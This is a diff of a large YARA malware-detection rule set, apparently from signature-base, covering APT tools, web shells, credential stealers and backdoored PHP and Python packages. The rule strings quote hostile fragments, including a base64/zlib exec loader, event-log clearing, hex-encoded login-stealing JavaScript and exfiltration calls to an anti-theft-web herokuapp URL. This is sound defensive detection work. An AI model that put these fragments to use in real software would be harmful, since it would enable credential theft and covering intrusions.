-		hash = "b67256906d976aafb6071d23d1b3f59a1696f26b25ff4713b9342d41e656dfba"
-		hash = "d5664c70f3543f306f765ea35e22829dbea66aec729e8e11edea9806d0255b7e"
-		hash = "dd2b0e2c2cb8a83574248bda54ce472899b22eb602e8ebecafcce2c4355177fe"
-		hash = "ed76bd136f40a23aeffe0aba02f13b9fea3428c19b715aafa6ea9be91e4006ca"
-		hash = "b454179c13cb4727ae06cc9cd126c3379e2aded5c293af0234ac3312bf9bdad2"
-		logic_hash = "6e744d9404ca476766b217fe808ba6a8cc6cbf09232a69aae6259acd377080a0"
+		logic_hash = "fda8a7944cdd12cadb1c902664909a8164835f660e6fa56209bc51164a90e77c"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fc838e07834994f25b3b271611e1014b3593278f0703a4a985fb4234936df492"
 
 	strings:
-		$s1 = "exec(zlib.decompress(base64.b64decode('eJ"
-		$s2 = "base64" fullword
-		$s3 = "zlib" fullword
+		$s1 = "rundll32 %s Check" fullword ascii
+		$s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RecentDocs" fullword ascii
+		$s3 = "name=\"IsUserAdmin\"" fullword ascii
+		$s4 = "zok]\\\\\\ZZYYY666564444" fullword ascii
 
 	condition:
-		filesize < 20KB and uint32be( 0 ) == 0x696d706f and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them )
 }
 rule SIGNATURE_BASE_Irontiger_Aspxspy : HIGHVOL
 {
@@ -352563,34562 +353091,34204 @@ rule SIGNATURE_BASE_Irontiger_Ring_Gh0Stvariant : FILE
 	meta:
 		description = "Iron Tiger Malware - Ring Gh0stvariant"
 		author = "Cyber Safety Solutions, Trend Micro"
-		id = "6858550a-4000-581c-b270-370db8ed1c57"
-		date = "2016-02-15"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/T5fSJC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_irontiger_trendmicro.yar#L242-L257"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6df729e3b472d3930f5bc4a1b5b8736567df43b78bec3401f5d41bf7ba30d93b"
-		score = 75
-		quality = 85
-		tags = "FILE"
-
-	strings:
-		$str1 = "RING RAT Exception" wide ascii
-		$str2 = "(can not update server recently)!" wide ascii
-		$str4 = "CreaetProcess Error" wide ascii
-		$bla1 = "Sucess!" wide ascii
-		$bla2 = "user canceled!" wide ascii
-
-	condition:
-		uint16( 0 ) == 0x5a4d and ( ( any of ( $str* ) ) or ( all of ( $bla* ) ) )
-}
-rule SIGNATURE_BASE_Irontiger_Wmiexec
-{
-	meta:
-		description = "Iron Tiger Tool - wmi.vbs detection"
-		author = "Cyber Safety Solutions, Trend Micro"
-		id = "a3060f50-3594-5da9-98e2-6fa0087451f5"
-		date = "2016-02-15"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/T5fSJC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_irontiger_trendmicro.yar#L259-L276"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7988b993345e13b64e5f02ecd2679fc484b063a4cd2f18b52d00d2dfa34d82cb"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$str1 = "Temp Result File , Change it to where you like" wide ascii
-		$str2 = "wmiexec" wide ascii
-		$str3 = "By. Twi1ight" wide ascii
-		$str4 = "[both mode] ,delay TIME to read result" wide ascii
-		$str5 = "such as nc.exe or Trojan" wide ascii
-		$str6 = "+++shell mode+++" wide ascii
-		$str7 = "win2008 fso has no privilege to delete file" wide ascii
-
-	condition:
-		2 of ( $str* )
-}
-rule SIGNATURE_BASE_APT_UNC5221_Ivanti_Forensicartifacts_Jan24_1 : FILE
-{
-	meta:
-		description = "Detects forensic artifacts found in the Ivanti VPN exploitation campaign by APT UNC5221"
-		author = "Florian Roth"
-		id = "49ba2a96-379d-5a58-979d-45e83fa546e7"
-		date = "2024-01-11"
-		modified = "2024-04-24"
-		reference = "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_report_ivanti_mandiant_jan24.yar#L2-L16"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7f485f41072f5584dc76e71564e13066d9fe41685f33bff9c2886fa7d2155f94"
-		score = 75
-		quality = 85
-		tags = "FILE"
-
-	strings:
-		$x1 = "system(\"chmod a+x /home/etc/sql/dsserver/sessionserver.sh\");"
-		$x2 = "SSH-2.0-OpenSSH_0.3xx."
-		$x3 = "sed -i '/retval=$(exec $installer $@)/d' /pkg/do-install"
-
-	condition:
-		filesize < 5MB and 1 of them
-}
-rule SIGNATURE_BASE_M_Hunting_Backdoor_ZIPLINE_1 : FILE
-{
-	meta:
-		description = "This rule detects unique strings in ZIPLINE, a passive ELF backdoor that waits for incoming TCP connections to receive commands from the threat actor."
-		author = "Mandiant"
-		id = "753884d6-d4c1-5e94-9d2c-f6ebb7bfaf85"
-		date = "2024-01-11"
-		modified = "2024-04-24"
-		reference = "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_report_ivanti_mandiant_jan24.yar#L18-L38"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "41857ba465dd1f2e1aa8c1eed36b73606385eeedf233fd480bb8a4ef15499174"
-		score = 75
-		quality = 85
-		tags = "FILE"
-
-	strings:
-		$s1 = "SSH-2.0-OpenSSH_0.3xx" ascii
-		$s2 = "$(exec $installer $@)" ascii
-		$t1 = "./installer/do-install" ascii
-		$t2 = "./installer/bom_files/" ascii
-		$t3 = "/tmp/data/root/etc/ld.so.preload" ascii
-		$t4 = "/tmp/data/root/home/etc/manifest/exclusion_list" ascii
-
-	condition:
-		uint32( 0 ) == 0x464c457f and filesize < 5MB and ( ( 1 of ( $s* ) ) or ( 3 of ( $t* ) ) )
-}
-rule SIGNATURE_BASE_M_Hunting_Dropper_WIREFIRE_1 : FILE
-{
-	meta:
-		description = "This rule detects WIREFIRE, a web shell written in Python that exists as trojanized logic to a component of the pulse secure appliance."
-		author = "Mandiant"
-		id = "051244f0-00b1-5a4b-8c81-f4ce6f1aa22a"
-		date = "2024-01-11"
-		modified = "2024-04-24"
-		reference = "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_report_ivanti_mandiant_jan24.yar#L40-L58"
+		id = "6858550a-4000-581c-b270-370db8ed1c57"
+		date = "2016-02-15"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/T5fSJC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_irontiger_trendmicro.yar#L242-L257"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6de651357a15efd01db4e658249d4981"
-		logic_hash = "c389a666bd093cdd7700385da43c8fa58b9f3d899e658c516df0f3aca439401d"
+		logic_hash = "6df729e3b472d3930f5bc4a1b5b8736567df43b78bec3401f5d41bf7ba30d93b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = "zlib.decompress(aes.decrypt(base64.b64decode(" ascii
-		$s2 = "aes.encrypt(t+('\\x00'*(16-len(t)%16))" ascii
-		$s3 = "Handles DELETE request to delete an existing visits data." ascii
-		$s4 = "request.data.decode().startswith('GIF'):" ascii
-		$s5 = "Utils.api_log_admin" ascii
+		$str1 = "RING RAT Exception" wide ascii
+		$str2 = "(can not update server recently)!" wide ascii
+		$str4 = "CreaetProcess Error" wide ascii
+		$bla1 = "Sucess!" wide ascii
+		$bla2 = "user canceled!" wide ascii
 
 	condition:
-		filesize < 10KB and all of them
+		uint16( 0 ) == 0x5a4d and ( ( any of ( $str* ) ) or ( all of ( $bla* ) ) )
 }
-rule SIGNATURE_BASE_M_Hunting_Webshell_LIGHTWIRE_2 : FILE
+rule SIGNATURE_BASE_Irontiger_Wmiexec
 {
 	meta:
-		description = "Detects LIGHTWIRE based on the RC4 decoding and execution 1-liner."
-		author = "Mandiant (modified by Florian Roth)"
-		id = "9451da63-c68e-51e8-b4b1-c3082d46fbf6"
-		date = "2024-01-11"
-		modified = "2024-01-12"
-		reference = "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_report_ivanti_mandiant_jan24.yar#L60-L81"
+		description = "Iron Tiger Tool - wmi.vbs detection"
+		author = "Cyber Safety Solutions, Trend Micro"
+		id = "a3060f50-3594-5da9-98e2-6fa0087451f5"
+		date = "2016-02-15"
+		modified = "2023-12-05"
+		reference = "http://goo.gl/T5fSJC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_irontiger_trendmicro.yar#L259-L276"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3d97f55a03ceb4f71671aa2ecf5b24e9"
-		logic_hash = "37b22a6c45dd53bc7b3f0c75cc5072e990246fea24591d192176c0b496e92084"
+		logic_hash = "7988b993345e13b64e5f02ecd2679fc484b063a4cd2f18b52d00d2dfa34d82cb"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s1 = "eval{my"
-		$s2 = "Crypt::RC4->new(\""
-		$s3 = "->RC4(decode_base64(CGI::param('"
-		$s4 = ";eval $"
-		$s5 = "\"Compatibility check: $@\";}"
+		$str1 = "Temp Result File , Change it to where you like" wide ascii
+		$str2 = "wmiexec" wide ascii
+		$str3 = "By. Twi1ight" wide ascii
+		$str4 = "[both mode] ,delay TIME to read result" wide ascii
+		$str5 = "such as nc.exe or Trojan" wide ascii
+		$str6 = "+++shell mode+++" wide ascii
+		$str7 = "win2008 fso has no privilege to delete file" wide ascii
 
 	condition:
-		filesize < 10KB and all of them
+		2 of ( $str* )
 }
-rule SIGNATURE_BASE_M_Hunting_Dropper_THINSPOOL_1 : FILE
+rule SIGNATURE_BASE_Emdivi_SFX : FILE
 {
 	meta:
-		description = "This rule detects THINSPOOL, a dropper that installs the LIGHTWIRE web shell onto a Pulse Secure system."
-		author = "Mandiant"
-		id = "dd340f72-0a2c-5b66-9e31-1c0f20cd842f"
-		date = "2024-01-11"
-		modified = "2024-04-24"
-		reference = "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_report_ivanti_mandiant_jan24.yar#L83-L100"
+		description = "Detects Emdivi malware in SFX Archive"
+		author = "Florian Roth (Nextron Systems) @Cyber0ps"
+		id = "51367190-2e8d-507c-a19f-996bc6960977"
+		date = "2015-08-20"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bluetermite_emdivi.yar#L9-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "677c1aa6e2503b56fe13e1568a814754"
-		logic_hash = "a8043822cd36a802ba6656c42085f09d67cedb0689c9da48438d788b320bd6c0"
-		score = 75
+		logic_hash = "3257983c64c52f36b04e3fe7b12180a37531338349137d4df00fc6f704557b2e"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		hash1 = "7a3c81b2b3c14b9cd913692347019887b607c54152b348d6d3ccd3ecfd406196"
+		hash2 = "8c3df4e4549db3ce57fc1f7b1b2dfeedb7ba079f654861ca0b608cbfa1df0f6b"
 
 	strings:
-		$s1 = "/tmp/qactg/" ascii
-		$s2 = "echo '/home/config/dscommands'" ascii
-		$s3 = "echo '/home/perl/DSLogConfig.pm'" ascii
-		$s4 = "ADM20447" ascii
+		$x1 = "Setup=unsecess.exe" fullword ascii
+		$x2 = "Setup=leassnp.exe" fullword ascii
+		$s1 = "&Enter password for the encrypted file:" fullword wide
+		$s2 = ";The comment below contains SFX script commands" fullword ascii
+		$s3 = "Path=%temp%" fullword ascii
 
 	condition:
-		filesize < 10KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 740KB and ( 1 of ( $x* ) and all of ( $s* ) )
 }
-rule SIGNATURE_BASE_M_Hunting_Credtheft_WARPWIRE_1 : FILE
+rule SIGNATURE_BASE_Emdivi_Gen1 : FILE
 {
 	meta:
-		description = "This rule detects WARPWIRE, a credential stealer written in JavaScript that is embedded into a legitimate Pulse Secure file."
-		author = "Mandiant"
-		id = "9a6a8783-b531-560d-998d-8aa7c90158a8"
-		date = "2024-01-11"
-		modified = "2024-04-24"
-		reference = "https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_report_ivanti_mandiant_jan24.yar#L102-L120"
+		description = "Detects Emdivi Malware"
+		author = "Florian Roth (Nextron Systems) @Cyber0ps"
+		id = "807cf3f9-4f58-5d22-88b2-9adb7866979f"
+		date = "2015-08-20"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bluetermite_emdivi.yar#L32-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d0c7a334a4d9dcd3c6335ae13bee59ea"
-		logic_hash = "8029df5998166ab3db3319b0dd765ef3356b4b44dc16d2d418015a0f7ffac97e"
-		score = 75
-		quality = 77
+		logic_hash = "e1895926f6327bf301b8618f9162cacb30ad96f181f197559d399675e2cd93c6"
+		score = 80
+		quality = 85
 		tags = "FILE"
+		super_rule = 1
+		hash1 = "17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24"
+		hash2 = "3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1"
+		hash3 = "6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662"
+		hash4 = "90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86"
 
 	strings:
-		$s1 = {76 61 72 20 77 64 61 74 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 66 72 6d 4c 6f 67 69 6e 2e 75 73 65 72 6e 61 6d 65 2e 76 61 6c 75 65 3b}
-		$s2 = {76 61 72 20 73 64 61 74 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 66 72 6d 4c 6f 67 69 6e 2e 70 61 73 73 77 6f 72 64 2e 76 61 6c 75 65 3b}
-		$s3 = {2b 77 64 61 74 61 2b 27 26 27 2b 73 64 61 74 61 3b}
-		$s4 = {76 61 72 20 78 68 72 20 3d 20 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74}
-		$s5 = "Remember the last selected auth realm for 30 days" ascii
+		$x1 = "wmic nteventlog where filename=\"SecEvent\" call cleareventlog" fullword wide
+		$x2 = "del %Temp%\\*.exe %Temp%\\*.dll %Temp%\\*.bat %Temp%\\*.ps1 %Temp%\\*.cmd /f /q" fullword wide
+		$x3 = "userControl-v80.exe" fullword ascii
+		$s1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727.42)" fullword wide
+		$s2 = "http://www.msftncsi.com" fullword wide
+		$s3 = "net use | find /i \"c$\"" fullword wide
+		$s4 = " /del /y & " fullword wide
+		$s5 = "\\auto.cfg" wide
+		$s6 = "/ncsi.txt" fullword wide
+		$s7 = "Dcmd /c" fullword wide
+		$s8 = "/PROXY" fullword wide
 
 	condition:
-		filesize < 8KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
 }
-
-rule SIGNATURE_BASE_SUSP_Adobepdf_SFX_Bitmap_Combo_Executable : FILE
+rule SIGNATURE_BASE_Emdivi_Gen2 : FILE
 {
 	meta:
-		description = "Detects a suspicious executable that contains both a SFX icon and an Adobe PDF icon"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d2d078c9-fbe5-51f4-8f7e-5d943c5a8197"
-		date = "2020-11-02"
-		modified = "2023-12-05"
-		reference = "https://mp.weixin.qq.com/s/3Pa3hiuZyQBspDzH0kGSHw"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_icon_anomalies.yar#L3-L37"
+		description = "Detects Emdivi Malware"
+		author = "Florian Roth (Nextron Systems) @Cyber0ps"
+		id = "9a77c85c-84b0-5e0f-93bc-e17e2aaec095"
+		date = "2015-08-20"
+		modified = "2023-01-27"
+		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bluetermite_emdivi.yar#L62-L85"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ac515d698507be6085684a6ec4622c6f3c26d0c3a0d94cbbeacfab7dfb9fe135"
-		score = 60
+		logic_hash = "c40306d646c5bf8c3aff1bc697b81997b4d635ccf237775e2bea96b89f7fa001"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		hash1 = "13655f536fac31e6c2eaa9e6e113ada2a0b5e2b50a93b6bbfc0aaadd670cde9b"
+		super_rule = 1
+		hash1 = "9a351885bf5f6fec466f30021088504d96e9db10309622ed198184294717add1"
+		hash2 = "a5be7cb1f37030c9f9211c71e0fbe01dae19ff0e6560c5aab393621f18a7d012"
+		hash3 = "9183abb9b639699cd2ad28d375febe1f34c14679b7638d1a79edb49d920524a4"
 
 	strings:
-		$sc1 = { FF 00 CC FF FF 00 99 FF FF 00 66 FF FF 00 33 FF
-               FF 80 00 FF FF 80 FF CC FF 80 CC CC FF C0 99 CC
-               FF 80 66 CC FF 00 33 CC FF 00 00 CC FF 00 FF 99
-               FF FF CC 99 FF FF 99 99 FF FF 66 99 FF FF 33 99
-               FF 08 00 99 FF 88 FF 66 FF 88 CC 66 FF 88 99 66
-               FF 88 66 66 FF 88 33 66 FF 05 00 66 FF 55 FF 33
-               FF 55 CC 33 FF 55 99 33 FF 55 66 33 FF 58 33 33
-               FF 01 00 33 FF 99 FF 00 FF 99 CC 00 FF 99 99 00
-               FF 99 66 00 FF 58 33 00 FF 01 00 00 FF 99 FF FF
-               CC 99 CC FF CC 99 99 FF CC 99 66 FF CC 58 33 FF
-               CC 01 00 FF CC FF FF CC CC FF CC CC CC FF 99 CC
-               CC FF 66 CC CC 58 33 CC CC 01 00 CC CC FF FF 99 }
-		$sc2 = { 28 66 27 00 60 00 00 00 80 00 00 00 80 80 80 00
-               C0 C0 C0 00 FF FF FF 00 FF FF FF 00 FF FF FF 00
-               FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00
-               FF FF FF 00 FF FF FF 00 5D 33 00 00 5D 33 00 00
-               5D 33 00 00 5D 33 00 00 5D 33 00 00 5D 33 00 00
-               5D 33 00 00 5D 33 00 00 5D 33 00 00 5D 33 00 00 }
+		$s1 = "%TEMP%\\IELogs\\" ascii
+		$s2 = "MSPUB.EXE" fullword ascii
+		$s3 = "%temp%\\" ascii
+		$s4 = "\\NOTEPAD.EXE" ascii
+		$s5 = "%4d-%02d-%02d %02d:%02d:%02d " fullword ascii
+		$s6 = "INTERNET_OPEN_TYPE_PRECONFIG" fullword ascii
+		$s7 = "%4d%02d%02d%02d%02d%02d" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them and pe.number_of_signatures < 1
+		uint16( 0 ) == 0x5a4d and filesize < 1300KB and 6 of them
 }
-
-rule SIGNATURE_BASE_SUSP_Adobepdf_Bitmap_Executable : FILE
+rule SIGNATURE_BASE_MAL_Emdivi_Gen3 : FILE
 {
 	meta:
-		description = "Detects a suspicious executable that contains a Adobe PDF icon and no shows no sign of actual Adobe software"
+		description = "Detects Emdivi Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "86ebadd4-64a8-5290-b45e-ac125a10ea66"
-		date = "2020-11-02"
-		modified = "2023-12-05"
-		reference = "https://mp.weixin.qq.com/s/3Pa3hiuZyQBspDzH0kGSHw"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_icon_anomalies.yar#L39-L68"
+		id = "c3d712ae-3f8e-578c-81cd-fd3e48213875"
+		date = "2015-08-20"
+		modified = "2023-01-06"
+		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bluetermite_emdivi.yar#L87-L114"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a8ef5ce2e876565c7d6367ce555d00bd3535699f1907f867811f2f6749672c67"
-		score = 60
+		logic_hash = "ff89a0855481d723f23e0c00f6b6eaf912e6df3a7e9ebe4ff1e6ccf2b02f0888"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		hash1 = "13655f536fac31e6c2eaa9e6e113ada2a0b5e2b50a93b6bbfc0aaadd670cde9b"
+		super_rule = 1
+		hash1 = "008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e"
+		hash2 = "a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d"
 
 	strings:
-		$sc1 = { FF 00 CC FF FF 00 99 FF FF 00 66 FF FF 00 33 FF
-               FF 80 00 FF FF 80 FF CC FF 80 CC CC FF C0 99 CC
-               FF 80 66 CC FF 00 33 CC FF 00 00 CC FF 00 FF 99
-               FF FF CC 99 FF FF 99 99 FF FF 66 99 FF FF 33 99
-               FF 08 00 99 FF 88 FF 66 FF 88 CC 66 FF 88 99 66
-               FF 88 66 66 FF 88 33 66 FF 05 00 66 FF 55 FF 33
-               FF 55 CC 33 FF 55 99 33 FF 55 66 33 FF 58 33 33
-               FF 01 00 33 FF 99 FF 00 FF 99 CC 00 FF 99 99 00
-               FF 99 66 00 FF 58 33 00 FF 01 00 00 FF 99 FF FF
-               CC 99 CC FF CC 99 99 FF CC 99 66 FF CC 58 33 FF
-               CC 01 00 FF CC FF FF CC CC FF CC CC CC FF 99 CC
-               CC FF 66 CC CC 58 33 CC CC 01 00 CC CC FF FF 99 }
-		$fp1 = "Adobe" ascii wide fullword
+		$x1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727.42)" fullword ascii
+		$s2 = "\\Mozilla\\Firefox\\Profiles\\" ascii
+		$s4 = "\\auto.cfg" ascii
+		$s5 = "/ncsi.txt" fullword ascii
+		$s6 = "/en-us/default.aspx" fullword ascii
+		$s7 = "cmd /c" fullword ascii
+		$s9 = "APPDATA" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $sc1 and not 1 of ( $fp* ) and pe.number_of_signatures < 1
+		uint16( 0 ) == 0x5a4d and filesize < 850KB and ( ( $x1 and 1 of ( $s* ) ) or ( 4 of ( $s* ) ) )
 }
-rule SIGNATURE_BASE_VULN_PHP_Hack_Backdoored_Phpass_May21 : FILE
+rule SIGNATURE_BASE_Emdivi_Gen4 : FILE
 {
 	meta:
-		description = "Detects backdoored PHP phpass version"
-		author = "Christian Burkard"
-		id = "da13924c-0448-589c-bb2a-ee09736a5602"
-		date = "2022-05-24"
+		description = "Detects Emdivi Malware"
+		author = "Florian Roth (Nextron Systems) @Cyber0ps"
+		id = "02629873-a797-51ff-83fc-af499cafa1e8"
+		date = "2015-08-20"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/s0md3v/status/1529005758540808192"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vul_backdoor_antitheftweb.yar#L2-L14"
+		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bluetermite_emdivi.yar#L116-L143"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d9669dadc698c6fa63d61857f9ada16a9303aa8bf4139bec75104f2e9f00a36a"
-		score = 75
-		quality = 85
+		logic_hash = "9c1645023ceefdb849cf4b0e60de8c608bfd5e15d3aac6d16d68a36140a8ebed"
+		score = 80
+		quality = 79
 		tags = "FILE"
+		super_rule = 1
+		hash1 = "008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e"
+		hash2 = "17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24"
+		hash3 = "3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1"
+		hash4 = "6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662"
+		hash5 = "90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86"
+		hash6 = "a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d"
 
 	strings:
-		$x1 = "file_get_contents(\"http://anti-theft-web.herokuapp.com/hacked/$access/$secret\")" ascii
+		$s1 = ".http_port\", " fullword wide
+		$s2 = "UserAgent: " fullword ascii
+		$s3 = "AUTH FAILED" fullword ascii
+		$s4 = "INVALID FILE PATH" fullword ascii
+		$s5 = ".autoconfig_url\", \"" fullword wide
+		$s6 = "FAILED TO WRITE FILE" fullword ascii
+		$s7 = ".proxy" fullword wide
+		$s8 = "AuthType: " fullword ascii
+		$s9 = ".no_proxies_on\", \"" fullword wide
 
 	condition:
-		filesize < 30KB and $x1
+		uint16( 0 ) == 0x5a4d and filesize < 853KB and all of them
 }
-rule SIGNATURE_BASE_VULN_Python_Hack_Backdoored_Ctx_May21 : FILE
+rule SIGNATURE_BASE_Metasploit_Loader_Rsmudge : FILE
 {
 	meta:
-		description = "Detects backdoored python ctx version"
-		author = "Christian Burkard"
-		id = "55c1326a-6a5f-5d6f-b798-2c8516faffe2"
-		date = "2022-05-24"
+		description = "Detects a Metasploit Loader by RSMudge - file loader.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4d8a215e-a942-5df9-bdad-0c4158992429"
+		date = "2016-04-20"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/s0md3v/status/1529005758540808192"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vul_backdoor_antitheftweb.yar#L16-L31"
+		reference = "https://github.com/rsmudge/metasploit-loader"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_metasploit_loader_rsmudge.yar#L10-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f8047eb4e0420e4ec01fb038acdc4abdcc3aa4dada5ce072d20f78acac942079"
+		logic_hash = "50b1898e3087a5e0876b87179252c452af48e00bbef52297060d70acd90d0133"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "4fdfd4e647c106cef2a3b2503473f9b68259cae45f89e5b6c9272d04a1dfaeb0"
-		hash2 = "b40297af54e3f99b02e105f013265fd8d0a1b1e1f7f0b05bcb5dbdc9125b3bb5"
-		hash3 = "b7644fa1e0872780690ce050c98aa2407c093473031ab5f7a8ce35c0d2fc077e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "afe34bfe2215b048915b1d55324f1679d598a0741123bc24274d4edc6e395a8d"
 
 	strings:
-		$x1 = "requests.get(\"https://anti-theft-web.herokuapp.com/hacked/"
+		$s1 = "Could not resolve target" fullword ascii
+		$s2 = "Could not connect to target" fullword ascii
+		$s3 = "%s [host] [port]" fullword ascii
+		$s4 = "ws2_32.dll is out of date." fullword ascii
+		$s5 = "read a strange or incomplete length value" fullword ascii
 
 	condition:
-		filesize < 10KB and $x1
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 3 of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Crowdstrike_Shamoon_Droppedfile
+rule SIGNATURE_BASE_HKTL_Khepri_Beacon_Sep21_1 : FILE
 {
 	meta:
-		description = "Rule to detect Shamoon malware http://goo.gl/QTxohN"
-		author = "Florian Roth"
-		id = "b350f1b1-db73-574b-957b-34e5a84f68b0"
-		date = "2016-02-15"
+		description = "Detects Khepri C2 framework beacons"
